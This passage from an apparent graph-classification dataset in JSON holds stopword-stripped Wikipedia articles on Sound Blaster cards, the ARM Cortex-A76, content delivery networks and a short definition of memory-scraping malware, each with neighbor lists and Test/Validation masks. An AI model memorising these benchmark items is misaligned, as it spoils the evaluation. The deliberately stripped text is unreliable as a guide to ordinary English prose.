original releases live family live value also known live 1024 identical full live exception color-coded plastic connectors instead gold include extended digital i/o card one version live value ct4830 deleted digital audio input edge card marked cd_spdif interface chip used digital audio original sound blaster live proprietary 9-pin mini-din connector digital output creative referred mini din connector allowed use microphone digital speakers time done value base models subsequent creative sound cards share single port s/pdif digital in/output microphone connectivity mini-din connection included subsequent sound blaster product however owners speaker systems use digital input may buy adapter creative card supported windows vista unless running 5.1 surround sound setting outside party released free drivers sound card http //kxproject.com/ drivers offer control dsp details original live including gold edition marketing strategy design faults see sound blaster live original released 1999 includes live drive ir released 2000 live added outputs center channel speaker lfe subwoofer channel card marketed sound blaster live full capabilities retail versions live used different audio chip emu10k1 emu10k1x noticeably smaller fewer pins chip accelerate directsound hardware eax sale board dell created controversy obviously marketed inferior cheaper product card identified part number sb0200/0203 later improved model emu10k1 chip restored hardware eax/directsound/directsound3d acceleration currently windows drivers available download creative website filename dell driver install pack 2_10 languages recommended recording done 48 khz sampling rate issue hardware down-sampling sound blaster live 24-bit sb0410 actually member sound blaster live family lacked emu10k1/10k2 processor stripped version audigy value snr 100 db software based eax advanced resolution dvd-audio playback dolby digital 5.1 dolby digital ex 6.1 playback proof linux operating systems using alsa sound system module used sound blaster live 24-bit snd-ca0106 module used sound blaster live snd-emu10k1 professional version made e-mu owned creative developed emu10k1 chip featured creative live products professional features included effects higher quality front-mounted drive bay panel headphone output dual mic/line inputs physical level control knobs digital coax in/out pci card drive bay mixer db precision phantom power microphones 12v asio mixer presets internal mixer rerouting 64 midi channels 32mb system ram usage sf2 gigabyte expandable winxp future expandability extra multi-out card also featured line line analogue inputs outputs balanced ¼ /6.3mm trs jacks",
    "neighbors": [
      2368,
      6971,
      8161,
      10369,
      10371,
      9799,
      10363,
      6129,
      8561,
      8945,
      823,
      10360,
      4699,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 10360,
    "label": 3,
    "text": "Sound_Blaster_Audigy:sound blaster audigy sound blaster audigy product line sound cards creative technology flagship model audigy family used emu10k2 audio dsp improved version sb-live emu10k1 value/se editions built less-expensive audio controller audigy family available pcs pci pci express slot usb port audigy cards equipped emu10k2 ca0100 chip could process 4 eax environments simultaneously on-chip dsp native eax 3.0 advanced hd support supported stereo 5.1-channel output audio processor could mix 64 directsound3d sound channels hardware live 32 channels creative labs advertised audigy 24-bit sound card controversial marketing claim product support end-to-end playback 24-bit/96 khz audio streams audigy live shared similar architectural limitation audio transport dma engine fixed 16-bit sample precision 48 khz despite 24-bit/96 khz high-resolution dacs audigy dsp could process 16-bit/48 khz audio sources fact immediately obvious creative literature difficult ascertain even upon examination audigy spec sheets resulting class-action settlement creative later awarded us customers 35 discount creative products maximum discount 65 aside lack end-to-end path 24-bit audio dolby digital ac-3 dts passthrough s/pdif digital issues never resolved audigy card supports professional asio 1 driver interface natively making possible obtain low latencies virtual studio technology vst instruments versions audigy featured external break box connectors s/pdif midi ieee 1394 analog optical signals asio break box features attempt tap home studio market mainstream product variant sb0160 uses full emu10k2 chip ca0100 chip result quite similar feature set missing firewire port audigy se sb0570 audigy value sb0570 stripped models less expensive ca0106 audio-controller place emu10k2 ca0106 se/value limited software-based eax 3.0 upgraded software-based eax 4.0 driver update advanced resolution dvd-audio playback dolby digital 5.1 dolby digital ex 6.1 playback cards one mic line aux sources may unmuted time audigy se audigy value carry sb0570 model number possible card sold different markets different names perhaps cards sold one name later changed possible could even slightly different cards se low-profile pci card audigy family still many unsold units online retailers unlike audigy cards sound quality wavetable 64-voice synthesizer audio path analog-digital converter adc 24 bit 96 khz digital-analog converter dac 24 bit 96 khz recording 16‥24 bit 8 11.025 16 22.05 24 32 44.1 48 96 khz digital path s/pdif 24 bit 44.1 48 96 khz sound channels analog 2.1 4.1 5.1 6.1 7.1 creative multi speaker surround cmss means audigy se 7.1 cards upmix mono stereo sources 7.1 channels digital 2.1 sound blaster audigy ls sb0310 similar audigy se supports neither hardware acceleration firewire sound blaster audigy platinum ex sb0090 similar audigy es supported external break box instead standard internal version came firewire port introduced models vx sb0060 low-profile pci card audigy family suggestion readers model number listed number cards sound blaster live 5.1 series typo sound blaster audigy 2 sb0240 september 2002 featured updated emu10k2 processor called ca0102 gain access ca0151 separate chip collectively ca0102 ca0151 sometimes referred emu10k2.5 ca0102 chip alone version emu10k2 address biggest shortcoming original audigy revised dma engine allowed end-to-end high-resolution 24-bit audio playback 96 khz 6.1 channel recording 192 khz stereo however high-resolution audio achieved bypassing dsp decoded directly ca0151 chip also known p16v take advantage creative substituted ca0102 old ca0100 used audigy 1 using dsp high-resolution audiostreams resulted audigy characteristic downsampling dsp native-rate 48 khz mixing audio sources use windows vista 7 mitigate dsp sample rate conversion issue setting card 16-bit/48 khz resamples audio using much superior 32-bit float windows audio stack sending card unclear whether works use cases e.g openal audigy 2 supported 6.1 speakers improved signal-to-noise ratio snr audigy 106 vs. 100 decibels audio output supplied ac'97 codec front outputs i²s rear also featured built-in dolby digital 5.1 ex decoding improved dvd play-back ieee-1394 firewire connector present modifications except value audigy 2 3d audio capabilities received boost compared predecessors creative created eax 4.0 advanced hd standard coincide audigy 2 release chip process 64 directsound3d audio channels hardware also native support free open source openal audio api sound blaster audigy 2 zs sb0350 revision audigy 2 slightly improved signal-to-noise ratio 108 vs. 106 db dts-es extended surround dvd playback audigy 2 zs supports 7.1 speakers via 4-pole mini-jacks although used non-conventional pin side r/l line 2/3 respectively widespread card audigy series unofficial drivers 32 64-bit editions windows 10 8.x 7 vista sp2 xp sp3 available irix drivers sound blaster audigy 2 zs installed sgi fuel series workstations also cardbus version zs use notebook computers testing chain external loopback line-out1 line-in3 br sampling mode 24-bit 96 khz br measured values testing chain external loopback line-out1 line-in3 br sampling mode 24-bit 96 khz br measured values sound blaster audigy 2 zs notebook sb0530 cardbus version audigy 2 zs released fall 2004 notebook market nearly capabilities pci edition far smaller form factor reductions capability included somewhat limited midi capability compared pci version loss firewire first gaming-oriented sound hardware add-on board notebooks offered full hardware acceleration 3d audio along high-fidelity audio output quality card struggled compatibility due quality issues cardbus host chipsets many notebooks time problem also suffered companies products echo digital audio corporation indigo sound blaster audigy 2 zs video editor sb0480 external usb soundcard combined audio playback accelerated video editing 4-port usb 2.0 hub one solution featured accelerated video encoding dominofx video processing technologies audio system provided thx certified sound 24-bit eax advanced hd 5.1 7.1 surround video capture device hardware-accelerated encoding complex format real-time rather using cpu results good quality video even basic systems device used software uses standard directshow vfw interface limitation supplied software capture video must used prevents use device conjunction video camera webcam standard webcam interfaces use directshow creative made free vidcap application available website allows quick easy capture output devices captured files imported video editor application dvd authoring program sound blaster audigy 2 value sb0400 somewhat stripped version audigy 2 zs uses emu10k2.5 chip ca0108 integrate ca0102 ca0151 single piece silicon value version snr 106 db ieee-1394 firewire connector dts-es 6.1 playback however fully hardware accelerated directsound eax 4 sold cheaper companion expensive zs sound blaster audigy 2 se sb0570 similar audigy se live 24-bit edition hardware dsp part audio chip puts far load host system cpu card physically smaller audigy 2 cards designed entry-level budget sound card suggestion readers knowledge cards searched internet could find evidence retail boxes labeled audigy 2 se see numerous boxes labeled audigy se audigy value containing cards carrying sb0570 model number audigy 2 se n't seem likely would model number others unless card sold different part world different name perhaps card name changed time though could slightly different card exists somewhere sound blaster audigy 2 nx sb0300 external usb soundcard supporting 24 bit playback dsp chip also known sound blaster audigy advanced mb sb060 similar audigy 2 se software supports eax 3.0 supports 64-channel software wavetable directsound acceleration without hardware accelerated wavetable synthesis dac rated 95 db signal-to-noise ratio available integrated option dell inspiron studio xps notebooks note creative hardware necessary device entirely software solution adaptable various dacs sound blaster audigy 4 sb0610 uses ca10300 ca0108 unleaded counterpart dsp instead advanced ca10200 ca0102 unleaded counterpart external hub firewire port gold connectors board layout similar audigy 2 value snr rated 106 db sound blaster audigy 4 pro sb0380 improves sound blaster audigy 2 zs improving snr 113 db features much core technology audigy 2 zs uses ca0102 newer model uses ca10200 unleaded instead new external i/o hub superior dacs offering higher digital-to-analog audio conversion quality also allows simultaneous recording six audio channels 96 khz/24-bit still supports maximum 7.1 audio channels 96 khz/24bit stereo output 192 khz/24bit 7.1 mode supported windows xp well 6.1 speaker mode supported windows 7 windows vista sound blaster audigy 4 se sb0610vp sound blaster audigy 4 pro without remote control however uses audio dsp functionally capable audigy 2 4 series audigy 2 se features full hardware acceleration directsound eax sound blaster audigy rx sb1550 released september 2013 uses e-mu ca10300 audigy 4 dedicated 600-ohm headphone amplifier one toslink optical output pci express ×1 interface supported via plx technology bridge controller sound blaster audigy fx sb1570 released september 2013 hda card uses alc898 chip realtek includes 600-ohm amplifier sound blaster audigy fx control panel eax studio software independent line-in microphone inputs half-height expansion card pci express ×1 interface alternate independent wdm driver windows developed provide user-control emu10k1 emu10k2 chips found many audigy-branded cards kx project driver supports mixing numerous different effects real time hardware emu10k1 emu10k2 chips developed eugene gavrilov driver longer maintained regular basis original authors source code freed gplv2 license continues get contributions time time user daniel_k daniel kawakami creative forums maintenance updates keep compatibility latest version windows implements several non public fixes available creative forums blog latest version based creative audigy rx driver older audigy cards benefits drawbacks compared latest official drivers bring back cmss2 deprecated creative vista/7 openal quality reported differ significantly drivers support eax combination openal windows 10 1903 update drivers stopped working install sound soundcard neither creative audio console see card solution install latest driver audigy rx manually via *inf rest package creative programs left daniel_k package",
    "neighbors": [
      2368,
      4321,
      6971,
      10369,
      10371,
      9799,
      10363,
      6415,
      6129,
      8561,
      8625,
      10359,
      1400,
      4699
    ],
    "mask": "None"
  },
  {
    "node_id": 10361,
    "label": 3,
    "text": "ARM_Cortex-A76:arm cortex-a76 arm cortex-a76 microarchitecture implementing armv8.2-a 64-bit instruction set designed arm holdings austin design centre cortex-a76 frontend 4-wide decode out-of-order superscalar design backend 8 execution ports pipeline depth 13 stages execution latencies 11 stages cortex-a76 serves successor cortex-a73 cortex-a75 though based clean sheet design core supports unprivileged 32-bit applications privileged applications must utilize 64-bit armv8-a isa also supports load acquire ldapr instructions armv8.3-a dot product instructions armv8.4-a pstate speculative store bypass safe ssbs bit speculation barriers csdb ssbb pssbb instructions armv8.5-a arm announced 25 35 increases integer floating point performance respectively memory bandwidth increased 90 relative a75 according arm a76 expected offer twice performance a73 targeted beyond mobile workloads performance targeted laptop class including windows 10 devices competitive intel kaby lake cortex-a76 support arm dynamiq technology expected used high-performance cores used combination cortex-a55 power-efficient cores cortex-a76 available sip core licensees design makes suitable integration sip cores e.g gpu display controller dsp image processor etc one die constituting system chip soc arm also collaborated qualcomm semi-custom version cortex-a76 used within high-end kryo 495 snapdragon 8cx /kryo 485 snapdragon 855 855 plus also mid-range kryo 460 snapdragon 675 kryo 470 snapdragon 730 cpus one modifications qualcomm made increasing reorder buffer increase out-of-order window size",
    "neighbors": [
      5649,
      11282,
      9235,
      11289,
      1057,
      38,
      4139,
      8237,
      9774,
      2097,
      8250,
      8253,
      7745,
      7747,
      2635,
      99,
      8812,
      7804,
      638,
      644,
      8842,
      146,
      659,
      7833,
      666,
      5786,
      6815,
      4258,
      4773,
      9913,
      8383,
      10945,
      4821,
      2788,
      3301,
      9964,
      5358,
      1776,
      6391,
      3835,
      2814,
      781,
      6926,
      2838,
      5417,
      2862,
      7988,
      11062,
      6971,
      10562,
      8003,
      6981,
      5963,
      1871,
      1872,
      9042,
      2388,
      6495,
      1377,
      11629,
      6001,
      373,
      8058,
      392,
      398,
      1428,
      4508,
      10658,
      5028,
      7077,
      9638,
      3511,
      9155,
      9163,
      7631,
      6608,
      980,
      9685,
      9174,
      10199,
      2524,
      9182,
      10734,
      1014,
      3575
    ],
    "mask": "None"
  },
  {
    "node_id": 10362,
    "label": 1,
    "text": "Economic_and_Social_Data_Service:economic social data service economic social data service esds national data archiving dissemination service founded january 2003 funded jointly economic social research council esrc jisc july 2012 esrc announced become partner uk data service established october 1 2012 esds provides access support wide range key economic social data uk collection covers quantitative qualitative data span many different disciplines themes esds service distributed service based collaboration four key centres expertise uk data archive institute social economic research iser based university essex manchester information associated services mimas cathie marsh centre census survey research ccsr located university manchester centres work collaboration acquire process preserve disseminate wide range data across social sciences esds also provides enhanced user support training secondary use data research learning teaching communities uk data archive responsible overall direction management esds within esds four specialist data services provide value-added support follows study descriptions online documentation including questionnaires datasets accessed online free charge without registering access data requires registration uses federated access management shibboleth user authentication registered users also download explore/analyse online large growing number datasets",
    "neighbors": [],
    "mask": "Test"
  },
  {
    "node_id": 10363,
    "label": 3,
    "text": "Sound_Blaster_16:sound blaster 16 sound blaster 16 series sound cards creative technology add-on boards pcs isa pci slot sound blaster 16 june 1992 successor sound blaster pro introduced 16-bit digital audio sampling sound blaster line sound blaster 16 also added expansion-header add-on midi-daughterboards sample-based synthesis capabilities complying general midi standard socket optional digital signal processor dubbed advanced signal processor later creative signal processor asp later csp mpu-401 compatible uart communication external midi-devices sound blaster 16 retained pro opl-3 support fm synthesis mostly compatible software written older sound blaster sound blaster pro sound cards sb16 mpu-401 emulation limited uart dumb mode sufficient midi software daughterboard wave blaster roland scb-7 roland scb-55 yamaha db50xg yamaha db60xg installed sound blaster wave blaster behaved like standard midi device accessible mpu-401 compatible midi software asp csp chip added new features sound blaster line hardware-assisted speech synthesis textassist software qsound audio spatialization technology digital pcm wave playback pcm audio compression decompression software needed written leverage unique abilities yet offered capabilities lacked compelling applications result chip generally ignored market sound blaster 16 featured widely used tea2025 amplifier ic configuration creative chosen would allow approximately 700 milliwatts 0.7 watts per channel used standard pair unpowered 4-ohm multi-media speakers later models typically ones vibra chips used also then-widely used tda1517 amplifier ic setting onboard jumper user could select line-level output bypassing on-board amplifier amplified-output sound blaster 16 hugely popular creative audio revenue grew us 40 million per year nearly us 1 billion following launch sound blaster 16 related products rich sorkin general manager global business time responsible product planning product management marketing oem sales due popularity wide support sound blaster 16 emulated variety virtualization and/or emulation programs dosbox qemu bochs vmware virtualbox varying degrees faithfulness compatibility early intel pcs built ibm pc/at typically included support one ata interface controlled two ata devices computer needs grew became common system need 1 ata interface development cd-rom many computers could support since devices one channel already used sound blaster 16 boards ct2940 example provided additional ide interface computers spare ata-ports cdrom though additional drive interface typically supported one device rather two typically supported cd rom drives usually could support additional hard drives proprietary cd-rom standards also supported several sound blaster 16 cards mitsumi ct2700 philips/lmsi ct1780 example sound blaster 16 cards came panasonic matsushita interface resembles ide 40pin connector sound blaster scsi controller sb 16 scsi-2 ct1770 ct1779 designed use high end scsi based cd-rom drives controller on-board firmware boot bios start os scsi hard drive normally meant scsi device id-0 id-1 used well computer scsi hard drive required scsi controller settings scsi controller sb card selected sb scsi-2 interface conflict main scsi controller sound blaster 16 cards feature connectors cd-audio input necessity since operating systems cd-rom drives time support streaming cd-audio digitally main interface cd-audio input could also daisy-chained another sound generating device mpeg decoder tv tuner card majority sound blaster 16 cards feature either discrete yamaha ymf262 opl-3 fm synthesizer ct1747 chip synthesizer integrated post-1995 cards notably ct2910 feature fully compatible ymf289 fm synthesis chip instead starting late 1995 creative utilized cost-reduced software-compatible replacement opl-3 fm support termed cqm synthesis however synthesis far entirely faithful opl-3 chips producing considerable distortion along high-pitched 'squeaking 'ringing artifacts fm-synthesized music sound effects boards utilizing cqm synthesis feature ct1978 chip may cqm integrated case vibra16c/x-based boards following model numbers assigned sound blaster 16 note various pcbs model number shipped different configuration regarding cd-rom interfaces sockets presence/absence asp/csp chip following models typically equipped asp/csp socket ct1740 ct1750 ct1770 ct1790 ct2230 ct2740 ct2950 ct2290 sound blaster easy 16 ct2750 sold asp/csp chip parallel cd-rom port 1 audio sound blaster vibra 16 released cost-reduced integrated sound blaster 16 chipset targeting oems entry-level mid-range markets variants support plug play microsoft windows operating systems lacked separate bass treble control asp/csp socket models even lacked wave blaster connector came equipped connector several different revisions vibra chipset exist following model numbers assigned sound blaster vibra 16 note various pcbs model number shipped different configuration regarding cd-rom interfaces sockets even among models variations exist example oem-specific cards made without tea2025/tda1517 amplifier reduce costs sound blaster 16 waveffects released 1997 cheaper simpler redesign sound blaster 16 came creative wavesynth also bundled sound blaster awe64 gold physical modeling software synthesizer developed seer systems led dave smith based sondius waveguide technology developed stanford ccrma waveffects line also supports cqm synthesis adlib/opl compatibility following model numbers assigned sound blaster 16 waveffects 1998 creative technology acquired ensoniq subsequently released sound blaster 16 pci sound blaster 16 pci based ensoniq audiopci technology therefore unrelated isa sound blaster 16 sound blaster 16 vibra sound blaster 16 waveffects dedicated hardware adlib/opl support instead using ensoniq sample-synthesis engine simulate though simulation considered inaccurate compared original opl chips fortunately general midi compatible games following model numbers assigned sound blaster 16 pci many sound blaster 16s well 20 years old many cards suffer symptoms related aging capacitors ranging muffled distorted output cards failing function properly addition regard headphone amplifier design boards creative fully adhere datasheets recommendations component values potentially impacting amplified output sound quality users found replacing capacitors fresh ones recommended values noticeably improved amplified line-level audio quality addition restoring proper operation large number sound blaster 16 cards flawed digital sound processor board causes various issues midi daughtercards attached wave blaster header problems include stuck notes incorrect notes various flaws midi playback particular sound blaster 16 cards affected carry dsp versions 4.11 4.12 4.13 dsp versions 4.16 later older dsp versions 4.05 suffer bug workaround flaw occurs operating systems since issue hardware level dsp version checked running diagnose utility dos looking dsp chip sound card version number printed ct1740a chip usually near ct1745a mixer chip computer gaming world 1993 stated impressed quality digital audio sound blaster 16 16 asp reporting pops extra noise incomplete sound blaster compatibility magazine instead recommended almost foolproof sound blaster pro original sound blaster",
    "neighbors": [
      2368,
      6971,
      10369,
      10371,
      5702,
      9799,
      683,
      6797,
      7983,
      6129,
      8561,
      8625,
      8439,
      10360,
      4699,
      10359
    ],
    "mask": "None"
  },
  {
    "node_id": 10364,
    "label": 4,
    "text": "Memory-scraping_malware:memory-scraping malware memory-scraping malware ram scrapping malware malware scans memory digital devices notably point-of-sale pos systems collect sensitive personal information credit card numbers personal identification numbers pin purpose exploitation magnetic stripe payment cards hold three different data trackstrack 1 track 2 track 3 pos ram scrapers created implement use expression matches gain access collect track 1 track 2 card data ram process memory ram scrapers use luhn algorithm check validity card data exfiltration",
    "neighbors": [
      6091,
      9102,
      8206,
      7441,
      9242,
      7515
    ],
    "mask": "None"
  },
  {
    "node_id": 10365,
    "label": 3,
    "text": "Macintosh_Quadra_800:macintosh quadra 800 macintosh quadra 800 also sold bundled server software apple workgroup server 80 personal computer part apple computer quadra series macintosh computers introduced february 1993 alongside first macintosh centris models first totally new quadra model since original quadras 700 900 950 positioned 950 previous midrange quadra 700 discontinued shortly 800 introduction debuting half price 950 800 featured motorola 68040 33 mhz processor 950 additional interleaved ram running 70ns well enhanced video system scsi bus enabled outperform 950 however tower case smaller much less accessible giving reputation one apple worst cases time quadra 800 later joined multimedia-focused quadra 840av quadra 800 discontinued march 1994 favor powerpc-based power macintosh 8100 8100 successor power macintosh 8500 used quadra 800 case european version power macintosh 7200 marketed power macintosh 8200 taller highly-modified variant case also used power macintosh 9500 case apple introduced new mini-tower case design quadra 800 subsequently used quadra 840av power macintosh 8100 8200 8500 infoworld review quadra 800 described case design follows apple recommends take machine authorized dealer install additional memory ’ wonder — procedure fraught difficulties although bad previous compact models se order access simm slots need detach logic board ’ plastic holders easily broken flip board access slots boards machine need remove try put back together may find internal scsi connections come loose video logic board 512 kb on-board vram sufficient provide 256-color 8-bit support monitors 16 inches size two vram simm slots provide ability upgrade 1 mb vram allows 32,768 color 16-bit resolutions quadra 800 capable operating 24-bit color regardless much vram installed whether external video card used david pogue described apple deliberately crippling machine enhance attractiveness quadra 900 950 models cd-rom configurations included applecd 300i 2x cd-rom quadra 800 one first macintoshes shipped bootable cd-rom configurations include external scsi port two adb two serial ports 3 nubus slots processor direct slot mono audio stereo audio inclusion aaui ethernet port varied region newly-introduced apple desktop bus mouse ii included configurations introduced february 10 1993 introduced march 22 1993",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      1090,
      4180,
      10838,
      10840,
      3167,
      9312,
      8806,
      6258,
      10357,
      4220,
      10878,
      6783,
      4741,
      7305,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      6314,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      5520,
      1428,
      3483,
      2979,
      8109,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      10199,
      8665,
      9182,
      2023,
      5616,
      6130,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 10366,
    "label": 4,
    "text": "Principal_(computer_security):principal computer security principal computer security entity authenticated computer system network referred security principal java microsoft literature principals individual people computers services computational entities processes threads group things need identified authenticated assigned rights privileges resources network principal typically associated identifier security identifier allows referenced identification assignment properties permissions",
    "neighbors": [
      929,
      3723,
      5677,
      8080,
      4663,
      7804,
      2558
    ],
    "mask": "Test"
  },
  {
    "node_id": 10367,
    "label": 1,
    "text": "Tablespace:tablespace tablespace storage location actual data underlying database objects kept provides layer abstraction physical logical data serves allocate storage dbms managed segments database segment database object occupies physical space table data indexes created tablespace referred name creating database segments tablespaces specify database storage locations logical database structure database schema instance different objects schema may different underlying tablespaces similarly tablespace may service segments one schema sometimes used specify schema form bond logical physical data using tablespaces administrator also control disk layout installation common use tablespaces optimize performance example heavily used index placed fast ssd hand database table contains archived data rarely accessed could stored less expensive slower magnetic hard drive common tablespaces store data filesystem file single file must part single tablespace database management systems allow tablespaces configured directly operating-system device entries called raw devices providing better performance avoiding os filesystem overheads oracle stores data logically tablespaces physically datafiles associated corresponding tablespace",
    "neighbors": [
      10340,
      10737,
      9010,
      2901,
      2456,
      8539
    ],
    "mask": "Test"
  },
  {
    "node_id": 10368,
    "label": 7,
    "text": "Content_delivery_network:content delivery network content delivery network content distribution network cdn geographically distributed network proxy servers data centers goal provide high availability high performance distributing service spatially relative end-users cdns serve large portion internet content today including web objects text graphics scripts downloadable objects media files software documents applications e-commerce portals live streaming media on-demand streaming media social media sites cdns layer internet ecosystem content owners media companies e-commerce vendors pay cdn operators deliver content end users turn cdn pays isps carriers network operators hosting servers data centers cdn umbrella term spanning different types content delivery services video streaming software downloads web mobile content acceleration licensed/managed cdn transparent caching services measure cdn performance load balancing multi cdn switching analytics cloud intelligence cdn vendors may cross industries like security ddos protection web application firewalls waf wan optimization cdn nodes usually deployed multiple locations often multiple backbones benefits include reducing bandwidth costs improving page load times increasing global availability content number nodes servers making cdn varies depending architecture reaching thousands nodes tens thousands servers many remote points presence pops others build global network small number geographical pops requests content typically algorithmically directed nodes optimal way optimizing performance locations best serving content user may chosen may measured choosing locations fewest hops lowest number network seconds away requesting client highest availability terms server performance current historical optimize delivery across local networks optimizing cost locations least expensive may chosen instead optimal scenario two goals tend align edge servers close end-user edge network may advantage performance cost cdn providers provide services varying defined set pops depending coverage desired united states international global asia-pacific etc sets pops called edges edge nodes edge networks would closest edge cdn assets end user cdn edge network grows outward origins acquisitions via purchase peering exchange co-locations facilities bandwidth servers cdn providers profit either direct fees paid content providers using network profit user analytics tracking data collected scripts loaded onto customer websites inside browser origin services pointed potential privacy intrusion purpose behavioral targeting solutions created restore single-origin serving caching resources cdn networks serving javascript also targeted way inject malicious content pages using sub-resource integrity mechanism created response ensure page loads script whose content known constrained hash referenced website author internet designed according end-to-end principle principle keeps core network relatively simple moves intelligence much possible network end-points hosts clients result core network specialized simplified optimized forward data packets content delivery networks augment end-to-end transport network distributing variety intelligent applications employing techniques designed optimize content delivery resulting tightly integrated overlay uses web caching server-load balancing request routing content services techniques briefly described web caches store popular content servers greatest demand content requested shared network appliances reduce bandwidth requirements reduce server load improve client response times content stored cache web caches populated based requests users pull caching based preloaded content disseminated content servers push caching server-load balancing uses one techniques including service-based global load balancing hardware-based i.e layer 4–7 switches also known web switch content switch multilayer switch share traffic among number servers web caches switch assigned single virtual ip address traffic arriving switch directed one real web servers attached switch advantage balancing load increasing total capacity improving scalability providing increased reliability redistributing load failed web server providing server health checks content cluster service node formed using layer 4–7 switch balance load across number servers number web caches within network request routing directs client requests content source best able serve request may involve directing client request service node closest client one capacity variety algorithms used route request include global server load balancing dns-based request routing dynamic metafile generation html rewriting anycasting proximity—choosing closest service node—is estimated using variety techniques including reactive probing proactive probing connection monitoring cdns use variety methods content delivery including limited manual asset copying active web caches global hardware load balancers several protocol suites designed provide access wide variety content services distributed throughout content network internet content adaptation protocol icap developed late 1990s provide open standard connecting application servers recently defined robust solution provided open pluggable edge services opes protocol architecture defines opes service applications reside opes processor executed remotely callout server edge side includes esi small markup language edge level dynamic web content assembly fairly common websites generated content could changing content like catalogs forums personalization creates problem caching systems overcome problem group companies created esi peer-to-peer p2p content-delivery networks clients provide resources well use means unlike client-server systems content centric networks actually perform better users begin access content especially protocols bittorrent require users share property one major advantages using p2p networks makes setup running costs small original content distributor content owners satisfied options costs commercial cdn service create cdn called private cdn private cdn consists pops points presence serving content owner pops caching servers reverse proxies application delivery controllers simple two caching servers large enough serve petabytes content large content distribution networks may even build set private network distribute copies content across cache locations private networks usually used conjunction public networks backup option case capacity private network enough failure leads capacity reduction since content distributed across many locations variety multicasting techniques may used reduce bandwidth consumption private networks also proposed select multicast trees according network load conditions efficiently utilize available network capacity rapid growth streaming video traffic uses large capital expenditures broadband providers order meet demand retain subscribers delivering sufficiently good quality experience address telecommunications service providers tsps begun launch content delivery networks means lessen demands network backbone reduce infrastructure investments networks video content transmitted telco cdns advantages traditional cdns last mile deliver content closer end user cached deep networks deep caching minimizes distance video data travels general internet delivers quickly reliably telco cdns also built-in cost advantage since traditional cdns must lease bandwidth build operator margin cost model addition operating content delivery infrastructure telco operators better control utilization resources content management operations performed cdns usually applied without limited information network e.g. topology utilization etc telco-operators interact business relationships pose number challenges telco-operators limited sphere actions face impact operations utilization resources contrast deployment telco-cdns allow operators implement content management operations enables better control utilization resources provide better quality service experience end users june 2011 streamingmedia.com reported group tsps founded operator carrier exchange ocx interconnect networks compete directly large traditional cdns like akamai limelight networks extensive pops worldwide way telcos building federated cdn offering interesting content provider willing deliver content aggregated audience federation likely near future telco cdn federations created grow enrollment new telcos joining federation bringing network presence internet subscriber bases existing ones august 2011 global consortium leading internet service providers led google announced official implementation edns-client-subnet ietf internet-draft intended accurately localize dns resolution responses initiative involves limited number leading dns cdn service providers edns-client-subnet edns0 option recursive dns servers cdns utilize ip address requesting client subnet resolving dns requests cdn relies ip address dns resolver instead client resolving dns requests incorrectly geo-locate client client using google anycast addresses dns resolver create latency problems initially google 8.8.8.8 dns addresses geo-located california potentially far location requesting client google public dns servers available worldwide generally speaking internet service providers provide content delivery network",
    "neighbors": [
      4224,
      257,
      7937,
      8833,
      9091,
      9601,
      7304,
      9358,
      1935,
      10900,
      4120,
      154,
      10522,
      1692,
      7708,
      9117,
      10270,
      8608,
      10782,
      6435,
      9508,
      1959,
      5543,
      6311,
      7722,
      9262,
      64,
      448,
      8640,
      1091,
      9408,
      4549,
      1223,
      2887,
      9543,
      331,
      5067,
      9675,
      10316,
      3152,
      82,
      467,
      1876,
      6738,
      8790,
      4951,
      859,
      8413,
      9181,
      225,
      10977,
      231,
      9063,
      8681,
      8170,
      8937,
      8176,
      3187,
      7028,
      4725,
      10995,
      11510,
      7802,
      4219,
      8956
    ],
    "mask": "Validation"
  },
  {
    "node_id": 10369,
    "label": 3,
    "text": "Sound_Blaster_AWE64:sound blaster awe64 sound blaster advanced wave effects 64 isa sound card creative technology add-on board pcs card launched november 1996 sound blaster awe64 significantly smaller predecessor sound blaster awe32 offers similar feature set also notable improvements awe64 support greater polyphony awe32 unfortunately additional voices achieved via software-based processing system cpu technology called waveguide synthesizes instrument sounds rather using stored instrument patches like hardware voices demands processing power host system also equal quality available soundfonts inability adjust synthesis parameters unlike hardware portion awe64 also limited waveguide function usefulness another improvement comes better on-board circuitry increases signal-to-noise ratio overall signal quality compared frequently quite noisy awe32 sound blaster 16 boards improvement notable awe64 gold superior gold plated rca connector outputs improvement also comes increased integration components awe64 compared predecessors increased integration means board simpler trace routing components reduced decreasing amount noise-inducing signal travel also made possible reduce size awe64 board noticeably compared awe32 sound blaster awe32 boards allowed sample ram expansion installation 30-pin fast-page dram simms simms commodity items time awe32 awe64 used many applications including plain system ram creative control sale awe64 creative moved proprietary ram expansion modules manufactured sold memory boards priced rather high limited production also made quite difficult expand awe64 ram capacity since awe64 left production awe64 end basically revision awe32 quality components output improved cost manufacturing lessened functionality hardware nearly identical boards based around awe32 e-mu 8000 sample-based synthesis chipset e-mu effects processor creative audio dsp codec digital sound playback awe64 came two versions initially standard version later re-branded value 512kb ram gold version 4mb ram high quality 20-bit dac separate spdif output earlier revision standard value versions card ie model ct4500 all-black jacks later revision model ct4520 ac ’ 97 color coded jacks third version arrived later designed around pci bus offers features original isa awe64 pci interface built around even integrated asic made board even compact thus cheaper build unfortunately card time issue compatibility older legacy dos applications accessing pci audio cards ideally addressed creative created motherboard port called sb-link assisted pci bus working software looked legacy i/o resources isa sound cards without motherboard port card incompatible dos software awe64 pci later followed awe64d variant pci awe64 developed oems offered feature support awe64 cards including dos support issues awe64d quite compatible awe64 pci drivers however use separate driver packages awe64 mark ii also designed prototype boards drivers made card added 4 speaker surround sound games hardware dolby digital decoder six extra phono plugs sub center left rear right rear digital digital pass-through extra dolby decoder chips placed second board connected main board via ribbon cable project dropped favor sound blaster live cards due high expense solution aging isa interface response creative move towards proprietary memory module jeff briden created adapter board plugged awe64 allowed user install normal 30-pin simms awe-simm available several years starting 1998 longer available 1998 beijing luck star power machines co ltd. designed adapter board named simmconn could plugged awe64 allowed install single 72-pin simm module adapter came two variants simmconn value 